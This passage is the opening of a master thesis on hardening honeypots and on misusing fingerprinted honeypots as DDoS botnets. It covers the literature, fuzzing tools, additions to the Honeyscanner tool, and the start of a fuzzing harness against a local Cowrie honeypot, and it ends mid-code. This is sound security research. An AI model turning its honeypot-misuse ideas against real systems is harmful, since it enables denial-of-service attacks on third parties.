==PAGE:1==
Hardening and misusing honeypots
Master Thesis
DTU Compute
Department of Applied Mathematics and Computer Science
==PAGE:2==
==PAGE:3==
Hardening and misusing honeypots
Master Thesis
June, 2024
By
Anders Skrøvseth Haugen
Copyright:
Reproduction of this publication in whole or in part must include the cus­
tomary bibliographic citation, including author attribution, report title, etc.
Cover photo:
Vibeke Hempler, 2012
Published by:
DTU, Department of Applied Mathematics and Computer Science, Elek­
trovej, Building 324, 2800 Kgs. Lyngby Denmark
www.compute.dtu.dk
ISSN:
[0000­0000] (electronic version)
ISBN:
[000­00­0000­000­0] (electronic version)
ISSN:
[0000­0000] (printed version)
ISBN:
[000­00­0000­000­0] (printed version)
==PAGE:4==
Approval
This thesis has been prepared over six months at the Section for Cybersecurity Engineer­
ing, Department of Applied Mathematics and Computer Science, at the Technical Univer­
sity of Denmark, DTU, in partial fulfilment for the degree Master of Science in Engineering,
MSc Eng.
It is assumed that the reader has a basic knowledge in the areas of cybersecurity and
computer science.
Anders Skrøvseth Haugen ­ s222990
Signature
Date
ii
Hardening and misusing honeypots
02.06.2024
==PAGE:5==
Abstract
This master thesis investigates a new and unconventional way of using fingerprinted hon­
eypots as botnets in a larger DDoS attack. The goal is to improve current honeypot vulner­
ability scanners, particularly the Honeyscanner tool, by implementing advanced fuzzing
techniques and supporting a wider variety of honeypot types and implementing an intuitive
graphical user interface (GUI). While honeypot misuse, particularly through fingerprinting,
is not new, using them to launch larger attacks is unprecedented. This thesis presents
various methods for utilizing fingerprinted honeypots in such attacks and assesses their
potential impact through a series of experiments. The findings contribute to the devel­
opment of more robust honeypots, offering new insights into their role in cybersecurity
defense mechanisms.
Hardening and misusing honeypots
iii
==PAGE:6==
Acknowledgements
Anders Skrøvseth Haugen, MSc Computer science and engineering, DTU
Creator of this thesis.
Dr. Emmanouil Vasilomanolakis, Associate Professor, Department of Applied Mathe­
matics and Computer Science, DTU
MSc thesis supervisor.
iv
Hardening and misusing honeypots
==PAGE:7==
Contents
Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
ii
Abstract . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
iii
Acknowledgements
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
iv
1
Introduction
1
1.1
Objective
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
1.2
Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
1.3
Research questions
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
1.4
Thesis Outline
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
2
2
Literature Review
3
2.1
Honeypot technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3
2.2
Honeypot vulnerabilities analysis . . . . . . . . . . . . . . . . . . . . . . . .
3
2.3
Honeypot Detection
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
4
2.4
Challenges with honeypots
. . . . . . . . . . . . . . . . . . . . . . . . . . .
4
2.5
Distrubuted attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
5
2.6
Mitigation strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
5
2.7
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
6
3
Background
7
3.1
Honeyscanner
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7
3.2
Fuzzing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7
3.3
DDoS attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
9
3.4
Botnet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
9
3.5
Misuse of Honeypots . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
3.6
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
4
Improvements to the Honeyscanner tool
11
4.1
Expanded Honeypot Support . . . . . . . . . . . . . . . . . . . . . . . . . .
11
4.2
Improved Fuzzing Capabilities
. . . . . . . . . . . . . . . . . . . . . . . . .
11
4.3
Implementation of a Graphical User Interface (GUI) . . . . . . . . . . . . . .
11
4.4
Experimental Findings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
4.5
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
5
Misuse experiments and evaluation
17
5.1
Etichal considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
5.2
Experiment Setup
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
5.3
Evaluation Metrics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
5.4
Evaluation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
5.5
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
6
Conclusion and future work
27
6.1
Future work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Bibliography
29
A Appendix
31
A.1 Curl and Wget comparison
. . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Hardening and misusing honeypots
v
==PAGE:8==
A.2 Python script for honeypot misuse attack
. . . . . . . . . . . . . . . . . . . 33
A.3 Go script for DDoS honeypot botnet attack
. . . . . . . . . . . . . . . . . . 35
vi
Hardening and misusing honeypots
==PAGE:9==
1
Introduction
The intention behind a honeypot, is that it acts as a decoy system that is intended to
look like a legitimate and vulnerable target. By doing so, it can draw attackers away
from the real target and collect important information about their strategies, methods,
and procedures. In the later years the concept of honeypot fingerprinting has gained
popularity. Honeypot fingerprinting is a technique used by attackers to identify and locate
honeypots, rendering these systems ineffective once identified. A problem showcased by
a research done by Vetterel et al. [50] concludes that patching the current generation of
honeypots will not fix this problem and that a new generation of honeypots is needed to
stand against honeypot fingerprinting techniques.
1.1
Objective
The primary objective of this master’s thesis is to explore potential misuse scenarios of
honeypots, specifically focusing on how attackers can exploit these fingerprinted hon­
eypots to contribute to Distributed Denial of Service (DDoS) attacks. Through a compre­
hensive examination of these misuse cases, the research aims to gather valuable insights
into the vulnerabilities where honeypots can contribute in DDoS attacks. Additionally, the
investigation will go deeper into the integration of advanced techniques, with a specific
emphasis on the application of fuzzing, to improve the existing Honeyscanner tool. By
leveraging the knowledge gained from analyzing honeypot vulnerabilities, this research
seeks to contribute to the advancement of honeypot technologies and their role in cyber­
security.
1.2
Motivation
The motivation behind investigating honeypot vulnerabilities is the dynamic nature of cy­
ber threats. The modern threat landscape is constantly changing and becoming more
complicated. Hackers are always finding new ways to bypass traditional security mea­
sures. Honeypots are becoming more and more essential components of network secu­
rity architectures, thus it’s critical to fully comprehend any weaknesses these honeypots
systems may have.
Beyond theoretical investigation, this topic is important because it directly affects the in­
tegrity of bigger network security systems in the actual world. Protecting against cyber
threats requires that vulnerabilities in honeypot deployments to be identified and ad­
dressed immediately.
With organisations increasingly relying on honeypots for cyber
threat detection and assessment, understanding and mitigating potential vulnerabilities
in these systems is essential.
1.3
Research questions
The key research questions that will be answered in this thesis are:
1. Investigate current honeypot vulnerabilities.
2. Examination of current fuzzing technology.
3. Improve vulnerability analysis of honeypots
4. Explore how honeypots can be exploited to contribute in DDoS Attacks.
Hardening and misusing honeypots
1
==PAGE:10==
1.4
Thesis Outline
This master’s thesis is organized into six primary chapters, each addressing different as­
pects of the research, starting from the introduction and motivation behind the study, fol­
lowed by a in depth literature review, a detailed background section, comprehensive im­
provements and evaluations, concluding with findings, and suggestions for future work.
Chapter 2:
The Literature Review chapter explores research and theoretical frameworks related to
honeypots, their vulnerabilities, and misuse. It covers different types of honeypots, ex­
amines common vulnerabilities and detection techniques, and addresses architectural,
legal, and ethical issues. The chapter also reviews Distributed Denial­of­Service (DDoS)
mechanisms, the role of botnets, and strategies like Software Bill of Materials (SBOM),
regular patching, and configuration changes to improve honeypot security. This chapter
provides a solid foundation for the coming sections of the thesis.
Chapter 3
The Background chapter provides essential information on key concepts and tools utilized
in this study. It starts by explaining the current features and capabilities of the Honeyscan­
ner tool, showing how it works and what it can do. Before various fuzzing methodologies
are categorized, and popular fuzzing libraries and frameworks are discussed. Addition­
ally, this chapter provides a comprehensive review of the Distributed Denial­of­Service
(DDoS) attacks. It explains the operation and role of botnets in executing these attacks
and explores the various ways attackers can misuse honeypots. This thorough exami­
nation ensures that readers are having good knowledge with the technical aspects and
terminologies essential to understanding the research.
Chapter 4:
The chapter on Improvements to the Honeyscanner Tool details the improvements made
to the Honeyscanner tool. These improvements include the integration of additional hon­
eypots, such as Glastopf and Conpot, the implementation of advanced fuzzing tools, in­
cluding Boofuzz, Atheris, and FFuf, and the development of an intuitive graphical user
interface (GUI). It documents their impact on the performance and capabilities of the Hon­
eyscanner tool.
Chapter 5:
The chapter on evaluation and experiments, will examine how honeypots can be used to
contribute in Distributed Denial of Service (DDoS) attacks, as well as the ethical issues
related to this kind of exploitation and the effects of the DDoS attacks. It will look at the
different ways malicious actors could use honeypots to plan, facilitate, or intensify DDoS
attacks.
Chapter 6:
The final chapter, Conclusion and Future Work, summarizes the key findings of the re­
search, discussing the implications and contributions to the field of cybersecurity. It iden­
tifies potential areas for future research, including misuse attacks, Slowloris attack poten­
tial, and continued enhancements to the Honeyscanner tool.
2
Hardening and misusing honeypots
==PAGE:11==
2
Literature Review
This literature review aims to provide a comprehensive exploration of existing research
in the field of honeypots, with a specific focus on their effectiveness, vulnerabilities, and
misuse cases. This will provide a solid foundation before going further into this thesis.
2.1
Honeypot technologies
Honeypots are diverse cybersecurity tools designed to lure attackers and gather valuable
threat intelligence. They accommodate many use cases and deployment scenarios, vary­
ing in complexity and degree of interaction. In this section, the low interaction and medium
interaction categories of honeypots, as well as an all­in­one honeypot, are examined.
2.1.1
Low interaction honeypots
Low interaction honeypots simulate only the most basic functionalities of target services or
applications, typically focusing on protocol­level interactions. By simulating limited service
responses, such as TCP handshake responses or basic HTTP requests, low interaction
honeypots minimize resource consumption and complexity while still providing valuable
insights into attacker behavior. Some of the most popular low interaction honeypots in­
clude Kippo [9] and Cowrie [5].
2.1.2
Medium interaction honeypots
Medium­interaction honeypots create a more engaging environment for attackers by mim­
icking a broader range of service functions and interactions. Unlike low interaction hon­
eypots, medium interaction honeypots may simulate file systems, databases, or applica­
tion logic, enabling more realistic interactions with attackers. While medium­interaction
honeypots require more resources than low­interaction honeypots, they provide greater
accuracy and a more convincing level of deception. Some of the most popular medium
interaction honeypots include Dionaea [10], Glastopf [19], and Conpot [4].
2.1.3
T­pot
T­Pot is an all­in­one, optionally distributed, multi­architecture honeypot platform. It sup­
ports over 20 honeypots and offers various visualization options using the Elastic Stack.
Additionally, T­Pot features animated live attack maps and several security tools to en­
hance the deception experience [46]. The idea behind T­Pot is to create a system where
the entire TCP network range, along with important UDP services, acts as honeypots.
Incoming attack traffic is forwarded to the most suitable honeypot for response and pro­
cessing.
A key strength of TPot is its community driven nature, with regular updates and contribu­
tions from security researchers worldwide. This collaboration ensures that the framework
remains updated with the latest security threats and trends, making it a valuable asset for
any cybersecurity toolkit.
2.2
Honeypot vulnerabilities analysis
Although honeypots are useful for identifying and evaluating cyber threats, honeypots
are not immune to vulnerabilities. Maintaining the integrity and efficiency of honeypot
deployments requires an understanding of these vulnerabilities and appropriate mitiga­
tion strategies. Research contributions that analyze vulnerabilities unique to honeypot
systems are examined in this section.
Hardening and misusing honeypots
3
==PAGE:12==
2.2.1
Honeyscanner
Koufakos [3] made a significant contribution with the development of the vulnerability anal­
ysis tool Honeyscanner, specifically designed for honeypots. By focusing on the unique
challenges presented by honeypot systems, Honeyscanner provides valuable insights
into identifying and addressing vulnerabilities. This work is essential for understanding
the difficulties of honeypot technologies and improving their security posture.
2.2.2
Other vulnerability analysis tools
While Honeyscanner is a vulnerability scanner specifically designed for honeypots, there
are many open­source and commercial products created for web applications and static
code analysis. For web application vulnerability scanning, tools like OWASP ZAP [34]
and Burp Suite [36] are popular and provide valuable insights into current application
vulnerabilities. For static code analysis, Checkmarx [2] and SonarQube [42] are widely
used. Although these tools can assist in vulnerability analysis, their effectiveness within
the context of honeypots may vary.
2.3
Honeypot Detection
This section explores various techniques for detecting honeypots, highlighting the impor­
tance of understanding their characteristics and behaviors.
2.3.1
Fingerprinting
The multistage framework introduced by Srinivasa, Pedersen, and Vasilomanolakis [43]
titled ”Gotta catch ’em all” offers a systematic approach to identifying and characterizing
different types of honeypots by fingerprinting them. This research is important because
it adds to the classification of honeypots and offers methods for differentiating between
variants with low and medium interactions. It is essential to comprehend all aspects of
honeypot fingerprinting to understand how this can affect honeypots and how attackers
might exploit them.
2.3.2
Fuzzing
Sun et al.’s research [44] offers a groundbreaking secure fuzzy testing method for identi­
fying honeypots in softwarized industrial cyber­physical systems. Existing honeypot iden­
tification techniques typically rely on either simplistic features that can be easily mimicked
by attackers or complex features that demand extensive interaction, thereby increasing
the risk of detection and exploitation. In contrast, Sun et al.’s approach provides a bal­
anced solution by integrating error handling inspired by vulnerability mining, which does
not require high levels of interaction while still offering high accuracy in identification.
2.4
Challenges with honeypots
Although honeypots are widely regarded as valuable tools for enhancing cybersecurity
defenses, they face several challenges that can significantly limit their effectiveness and
compromise their integrity. These difficulties underscore the complexity of setting up and
maintaining honeypot infrastructures, despite their inherent advantages in identifying and
diverting malicious activities.
2.4.1
Honeypot architecture
Vetterl and Clayton’s [50] research employs extensive Internet­wide scans to identify and
evaluate low­ and medium­interaction honeypots, with a particular focus on SSH honey­
pots. The findings not only highlight instances but also underscore concerns regarding the
maintenance practices of SSH honeypots. By revealing instances of neglecting updates
for extended periods, this study emphasizes the importance of comprehensive security
measures to ensure the integrity of honeypots.
4
Hardening and misusing honeypots
==PAGE:13==
2.4.2
Legal and Ethical Considerations
The research conducted by Sokol, Pavol et al. [41] looks into the complex legal and eth­
ical considerations associated with deploying honeypots. A primary concern is privacy,
particularly regarding the collection and handling of sensitive information such as IP ad­
dresses. Organizations must navigate the legal frameworks governing data protection to
ensure compliance and avoid potential legal repercussions.
Another significant issue is liability, understanding the potential risks associated with hon­
eypot deployment and then take appropriate precautions to mitigate these risks.
Additionally, it is crucial that honeypots are designed and operated in a manner that does
not entrap attackers into committing illegal acts, which could raise ethical and legal issues.
Therefore, finding a balance between effectively gathering information and avoiding en­
trapment is essential for responsible use of honeypots.
2.5
Distrubuted attacks
Distributed Denial­of­Service (DDoS) attacks and the botnets that power them pose sig­
nificant threats to the stability and security of digital infrastructure. This section looks into
the complex landscape of DDoS attacks, examining the critical role that botnets play in
orchestrating these attacks. By analyzing comprehensive surveys and research studies,
valuable insights are gained into the evolution of DDoS threats, the mechanisms of attack,
prevention and mitigation techniques, and the dynamics of botnets.
2.5.1
DDoS
In their comprehensive survey, Mahjabin et al. [29] looks into the landscape of Distributed
Denial­of­Service (DDoS) attacks, shedding light on various dimensions such as evolu­
tion, attack mechanisms, prevention, mitigation techniques, and future research direc­
tions. The survey extensively explores existing protection and mitigation techniques em­
ployed to counter DDoS attacks. From network­based filtering and traffic diversion to
rate limiting and anomaly detection, a broad range of approaches is evaluated for their
efficiency in mitigating various attack vectors. This analysis is important for the thesis
as it sheds light on the defensive measures deployed by organizations to detect and miti­
gate DDoS threats, including potential strategies for identifying and neutralizing honeypot­
based attack vectors.
2.5.2
Botnet
Botnets play an important role in the orchestration of Distributed Denial­of­Service (DDoS)
attacks, enabling attackers to use a network of compromised devices to flood target sys­
tems with malicious traffic. Research by Hoque et al.[24] provides valuable insights into
the trends and challenges associated with botnets in DDoS attacks. The analysis ex­
plains the mechanisms by which botnets are recruited, controlled, and utilized to launch
large­scale DDoS campaigns. Understanding the dynamics of botnets provides insights
into the strategies employed by attackers to disrupt services.
2.6
Mitigation strategies
In this section, a few mitigation techniques designed to strengthen honeypot against cyber
attacks are examined. By implementing proactive measures and utilizing cybersecurity
research findings, the effectiveness of honeypots can be improved and potential risks
mitigated.
2.6.1
SBOM
Sehgal and Ambili’s work [37] presents a comprehensive exploration of the Software Bill
of Materials (SBOM) and its implications for software supply chain security. In the context
Hardening and misusing honeypots
5
==PAGE:14==
of strengthening honeypots, this paper provides valuable insights into creating detailed in­
ventories of software components, dependencies, and configurations. The SBOM­based
approach outlined in their research offers a strategic roadmap for enhancing security mea­
sures and proactively addressing potential vulnerabilities within open source project, such
as most honeypots.
2.6.2
Regular Patching and Updates
Ensuring that honeypot systems are regularly patched and updated is a fundamental mit­
igation strategy. By keeping software and systems up­to­date, organizations can protect
honeypots from known vulnerabilities and exploits. Vetterl and Clayton’s research [50]
highlights the importance of maintaining current software versions to prevent exploitation.
2.6.3
Customizing Honeypot Configurations
As emphasized by Srinivasa et al. [43], changing the default configurations is a critical
strategy in making honeypots harder to detect. Attackers often rely on the predictable,
default settings of commercial and open­source honeypot solutions to identify and bypass
them. By customizing these configurations, defenders can increase the stealth and ef­
fectiveness of their honeypots. In their research, they detected over 21,000 honeypots
running with default configurations, underscoring the widespread vulnerability due to pre­
dictable settings.
2.7
Summary
This literature review has provided an in­depth exploration of current research on hon­
eypots, focusing on their technologies, vulnerabilities, and detection methods. Various
types of honeypots, including low­interaction, medium­interaction, and an all in one plat­
form were examined. Highlighting their specific uses and challenges. The review detailed
the vulnerabilities in honeypot systems and emphasized the importance of tools like Hon­
eyscanner for vulnerability analysis. Additionally, it discussed the complexities of de­
ploying and maintaining honeypots, addressing issues such as detectability, architectural
challenges, and legal and ethical considerations. The role of Distributed Denial­of­Service
(DDoS) attacks and the critical function of botnets were analyzed. Finally, several mitiga­
tion strategies were explored, including the implementation of Software Bill of Materials
(SBOM), regular patching and updates, and customization of honeypot configurations to
improve the security and effectiveness.
6
Hardening and misusing honeypots
==PAGE:15==
3
Background
Understanding the various tools and strategies used by attackers and defenders is crucial
in the dynamic field of cybersecurity. This chapter looks into several key concepts cen­
tral to cyberattacks and defense strategies. It provides a detailed analysis of Distributed
Denial­of­Service (DDoS) attacks, fuzzing techniques, honeypot misuse, the Honeyscan­
ner tool, and botnets. These sections offer a comprehensive background, before going
further to the experiments and improvements.
3.1
Honeyscanner
Honeyscanner is an advanced tool with both passive and active attack capabilities that
is intended for automated vulnerability analysis. Currently the honeyscanner tool is sup­
porting Conpot, Dioneea, Cowrie and Kippo all serving on ports for either SSH or Telnet.
On the passive side, Honeyscanner is particularly good at static code analysis, software
library vulnerability checks, and container security scanning when it comes to passive
attacks. It makes use of tools like a proprietary library vulnerability scanner, Trivy for
container security, and Bandit for Python code analysis. In order to find any weaknesses
in the software and configuration of the honeypot without having to launch an attack.
On the active front, Honeyscanner employs a variety of techniques to thoroughly test the
honeypot’s defenses. This includes Denial of Service (DoS) attacks, which overload the
honeypot to assess its resilience, and fuzzing, which involves sending malformed or un­
expected inputs to discover vulnerabilities. Additionally, Honeyscanner exploits known
vulnerabilities using tools like Metasploit to target identified CVEs (Common Vulnerabil­
ities and Exposures)[7] in the honeypot’s software libraries. It also performs tarbomb
attacks to test the honeypot’s handling of specially crafted archive files that can consume
significant storage space when extracted.
3.2
Fuzzing
Fuzzing is a dynamic software testing technique employed to uncover vulnerabilities in
programs by introducing unexpected or unpredictable data inputs [33]. This method in­
volves the automated generation of a wide array of inputs to detect vulnerabilities that
traditional testing methods may overlook. By creating diverse inputs and analyzing the
responses of the target application, fuzzing tools continuously subject the application to
various scenarios. This process monitors for crashes, failures, or other anomalous be­
haviors, thereby significantly improving the detection and resolution of potential security
flaws.
Fuzzing aims to proactively detect a wide range of vulnerabilities, including buffer over­
flows, memory leaks, input validation issues, and logic flaws, which could lead to security
threats such as data breaches or system intrusions. It complements standard testing
approaches like unit testing and integration testing by putting the program through un­
expected scenarios and ensuring its resilience and robustness under varied conditions.
Furthermore, fuzzing can be used on a variety of software types, including network pro­
tocols, web applications, file formats, and system libraries.
The importance of fuzzing lies in its proactive approach to discovering vulnerabilities early
in the development process, improving software reliability and compliance with industry
Hardening and misusing honeypots
7
==PAGE:16==
standards. Its automated nature and ability to uncover bugs make it an efficient and cost
effective practice. By continuously running fuzzing tests better security and quality can be
expected, ultimately contributing to the overall security and robustness in the applications
3.2.1
Types of fuzzing
Fuzzing encompasses a range of techniques that can be used to discover vulnerabilities
in software. Each approach offers unique advantages and focuses on different aspects
of the testing process.
Mutation­based fuzzing
Mutation­based fuzzing involves modifying or mutating existing inputs to generate new
test cases [16]. This technique typically starts with valid inputs and applies random or
systematic changes to create variations. These variations are then used to test the tar­
get program for unexpected behavior or vulnerabilities. While mutation­based fuzzing is
relatively simple, it can be effective in discovering certain types of bugs, especially those
related to input validation or parsing errors.
Behavioral fuzzing
Behavioral fuzzing focuses on understanding and mimicking the behavior of the target
application’s protocol or communication interface [17]. Instead of blindly mutating inputs,
behavioral fuzzer’s analyze the structure and semantics of the protocol to generate mean­
ingful test cases. This approach allows for more targeted testing and can uncover vulner­
abilities specific to protocol implementations, such as buffer overflows or protocol logic
errors.
Coverage­guided fuzzing
Coverage­guided fuzzing combines the principles of mutation­based fuzzing with dynamic
code coverage analysis [18]. It continuously monitors the code coverage achieved by dif­
ferent test inputs and prioritizes inputs that lead to unexplored or uncovered code paths.
By focusing on maximizing code coverage, coverage­guided fuzzer’s can efficiently ex­
plore the program’s behavior space and uncover deep or complex vulnerabilities that may
remain undetected with other fuzzing techniques.
3.2.2
Popular fuzzing libraries
Fuzzing libraries and tools are essential for automating and streamlining the fuzzing pro­
cess, making it efficient and straightforward to test applications and identify vulnerabilities.
This section examines several popular fuzzing libraries and their applications.
Boofuzz
Boofuzz is a robust and flexible mutation­based fuzz testing tool. It provides a Python­
based framework for crafting and executing fuzz tests against various network protocols
and file formats. Boofuzz simplifies the process of generating mutated test cases and
automating the fuzzing process.
One of Boofuzz’s key features is its ability to craft protocol­aware fuzz tests. By under­
standing the structure and semantics of protocols, Boofuzz can generate meaningful test
cases that closely mimic legitimate traffic while introducing variations. This approach can
lead to the discovery of vulnerabilities specific to protocol implementations.
FFuf
FFuf, short for ’Fuzz Faster U Fool,’ is a powerful and flexible web fuzzing tool, proficient
at uncovering hidden directories, files, and sensitive resources within web applications
hosted on honeypots [13]. Its capability to efficiently perform directory and file fuzzing en­
ables the discovery of undocumented endpoints, such as administrative panels or backup
directories, revealing potential attack vectors and system configurations. Known for its
speed, efficiency, and ease of use, FFuf facilitates directory and parameter brute­forcing
8
Hardening and misusing honeypots
==PAGE:17==
attacks, aiding in the identification of vulnerabilities like information disclosure and access
control issues.
Additionally, FFuf’s ability to capture server responses, including HTTP status codes and
headers, provides valuable insights into web server software and potential vulnerabilities
coming from misconfigurations. By effectively identifying error messages and response
codes, FFuf helps detect vulnerabilities such as SQL injection and cross­site scripting,
enabling proactive mitigation of potential exploits.
Atheris
Atheris is an advanced coverage­guided fuzzing tool developed by Google [1]. It inte­
grates seamlessly with the Python programming language and leverages Low Level Vir­
tual Machine(LLVM)[27] based instrumentation to perform efficient code coverage anal­
ysis. Atheris prioritizes inputs that lead to increased code coverage, allowing for thor­
ough exploration of the target program’s execution paths. By combining coverage­guided
fuzzing with Python’s simplicity and flexibility it stands out as a powerful fuzzing library.
3.3
DDoS attacks
Distributed Denial of Service (DDoS) attacks have emerged as a significant threat in the
digital age, causing substantial disruptions to online services, financial losses, and rep­
utational damage. These attacks involve overwhelming a target system or network with
excessive, often coordinated traffic from multiple sources, typically using botnets. As
DDoS attacks evolve in scale and sophistication, the need to develop innovative defense
strategies to protect critical systems and networks.
DDoS attacks can be categorized into several types, each employing different techniques
to achieve their disruptive goals. The primary categories include volumetric attacks, pro­
tocol attacks, and application layer attacks [52]. Volumetric attacks aim to consume the
bandwidth of the target network by generating massive amounts of data. Protocol attacks,
such as SYN floods, exploit weaknesses in the network protocol stack, causing the target
to become unresponsive. Application layer attacks, like HTTP floods, target specific web
applications to disrupt the service.
The consequences of a successful DDoS attack can be severe. The immediate impact
often includes significant downtime, loss of revenue, and costs associated with mitigating
the attack and restoring services. Long­term consequences may involve loss of customer
trust, reputational damage, and potential legal liabilities.
3.4
Botnet
Botnets are a significant concern in cybersecurity, leveraging compromised systems to
carry out various malicious attacks like Distributed Denial of Service (DDoS) attacks and
data theft. Typically, a botnet consists of infected computers controlled by cybercrimi­
nals through a central command­and­control (C&C) infrastructure [25]. These bots are
recruited through malware, phishing, and exploit kits, making them formidable tools for
large­scale cyberattacks.
To combat botnet threats, a comprehensive strategy is essential. This strategy should in­
clude implementing robust endpoint security measures, patching software vulnerabilities
exploited by botnet operators, conducting regular vulnerability assessments, and deploy­
ing network­based intrusion detection and prevention systems [25].
In this research project, the idea is to exploring an unconventional way of generating a
botnet DDoS attack. This is by using fingerprinted honeypots as a new type of botnet.
Hardening and misusing honeypots
9
==PAGE:18==
Unlike traditional botnets, which rely on compromised devices, fingerprinted honeypots
mimic legitimate systems and services, exploring a new possible way that actors can use
to launch their attacks.
3.5
Misuse of Honeypots
While honeypots are valuable tools for detecting and studying cyber attackers, they can
themselves become targets of misuse. Misuse attacks involve adversaries exploiting vul­
nerabilities or misconfigurations in honeypot deployments to achieve various malicious
objectives.
3.5.1
Types of Misuse Attacks
Understanding these attack vectors is crucial for effectively identifying how honeypots can
be exploited in subsequent experiments. Misuse attacks can undermine the integrity and
purpose of honeypots, turning them from tools of defense into liabilities. Some common
types of misuse on honeypots include:
Honeypot Evasion
Attackers may attempt to misuse honeypots by identifying and evading them through var­
ious sophisticated techniques. These techniques involve analyzing the behavior of hon­
eypots, fingerprinting their characteristics, or exploiting known weaknesses in their imple­
mentations. Evasion methods can include traffic analysis, signature detection avoidance,
and emulation detection. By employing these techniques, attackers aim to avoid detec­
tion or interaction with honeypots, thereby bypassing the security measures intended to
monitor and trap malicious activities [47].
Honeypot Poisoning
In honeypot poisoning attacks, adversaries manipulate the honeypot environment or its
data to deceive defenders. This can involve injecting false or misleading information into
the honeypot to obscure attacker activities, alter the perceived threat landscape, or un­
dermine the effectiveness of the honeypot deployment [47].
Honeypot Compromise
Adversaries may target honeypots with the intent to compromise and control them for
further malicious activities. Once compromised, honeypots can be used as launching
pads for attacks against other systems, as part of botnets, or for exfiltrating sensitive
data. Compromised honeypots may also serve as points for lateral movement within a
network.[47]
3.6
Summary
This chapter examines important ideas in cybersecurity, with an emphasis on the instru­
ments and tactics used by both attackers and defenders. It explores botnets, fuzzing
techniques, misuse of honeypots, Distributed Denial of Service (DDoS) attacks, and the
Honeyscanner tool. Gaining an understanding of these components lays a strong basis
for the experimental analysis and improvements covered in the next chapters.
10
Hardening and misusing honeypots
==PAGE:19==
4
Improvements to the Honeyscanner tool
In this chapter, the results and insights gained from experiments conducted using the im­
proved Honeyscanner tool are presented. The main objective is the evaluation of the tool’s
improvements, such as its improved fuzzing capabilities and wider support for honey­
pots. Tools like Boofuzz, Artheris and FFuf were used, and more honeypots like Glastopf
and Conpot were integrated to evaluate how well these improvements identified potential
threats.
4.1
Expanded Honeypot Support
In this section, the expansion of Honeyscanner support for various honeypots to improve
its capability in identifying advanced threats will be explored. Initially, a limited number of
honeypots were supported by Honeyscanner, which restricted its effectiveness. The tool
has now been updated to include support for additional honeypots, such as Glastopf and
Conpot. Previously, support for Conpot was limited to port 23 (Telnet). With the added
support for port 80 (HTTP) and port 21 (FTP), a broader range of Conpot’s capabilities
can now be tested, providing a more comprehensive security analysis.
Glastopf is used for simulating web vulnerabilities, making it an ideal tool for detecting
web­based threats. While Conpot, on the other hand, focuses on industrial control sys­
tems, thereby broadening Honeyscanner’s application to include critical infrastructure pro­
tection.
In section 4.4, the newly added honeypots will be evaluated using various fuzzing tech­
niques to identify any previously unknown vulnerabilities.
4.2
Improved Fuzzing Capabilities
Fuzzing is a crucial technique for discovering vulnerabilities by supplying invalid, unex­
pected, or random data to a program’s inputs. Previously, Honeyscanner employed basic
fuzzing techniques that were limited in scope and effectiveness. To improve the fuzzing
capabilities of Honeyscanner, the tools Boofuzz, Artheris, and FFuf have been integrated,
making the fuzzing process more efficient and comprehensive.
In section 4.4, the newly integrated fuzzing techniques are evaluated against various hon­
eypots to assess their effectiveness and performance.
4.3
Implementation of a Graphical User Interface (GUI)
One of the things that makes the Honeyscanner tool hard to use is the lack of a graphical
user interface (GUI). Therefore, an intuitive interface has been developed using Tkinter
[48], which can been seen in figure 4.1. This graphical user interface is built with simplicity
in mind, therefore it only includes the most necessary information. The GUI has also
includes a new feature where it’s possible to choose if the user wants to only run passive
or active attacks against the given honeypot.
The terminal window will copy the information that is written from the command line win­
dow and showcase it. The GUI will have these values as a default so it’s easier for the
user of the GUI to understand the format and what values should be written in each field.
At the bottom, there is a clear button which will clean the terminal window.
Hardening and misusing honeypots
11
==PAGE:20==
Figure 4.1: The GUI for the honeyscanner tool
12
Hardening and misusing honeypots
==PAGE:21==
4.4
Experimental Findings
This chapter presents the experimental results from several fuzzing strategies used to de­
tect vulnerabilities and evaluate the robustness of various network protocols and services.
Tools such as Cowrie, Artheris, Boofuzz, and FFuf were utilized to conduct comprehen­
sive testing on various aspects of network security, including HTTP and FTP requests, as
well as URL and form inputs. All honeypots utilized in these experiments were operated
under default configurations to maintain a standardized baseline for evaluation.
4.4.1
Cowrie exception using Artheris
In this section, Atheris is utilized to fuzz Cowrie, which is running the latest version (2.5.0).
Figure 4.1 presents a code snippet demonstrating how Atheris is set up to fuzz the honey­
pot. This code snippet illustrates the process of connecting to the Cowrie honeypot using
the SSHClient provided by Paramiko [35]. It shows the establishment of a connection to
the honeypot, the execution of commands received from Atheris, and the interaction with
the system accordingly.
1
import sys
2
import atheris
3
import socket
4
import paramiko
5
6
def fuzz_cowrie(data):
7
try:
8
IP = 'localhost'
9
PORT = 2222
10
USER = 'root'
11
PASSWORD = 'antsql'
12
13
ssh = paramiko.SSHClient()
14
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
15
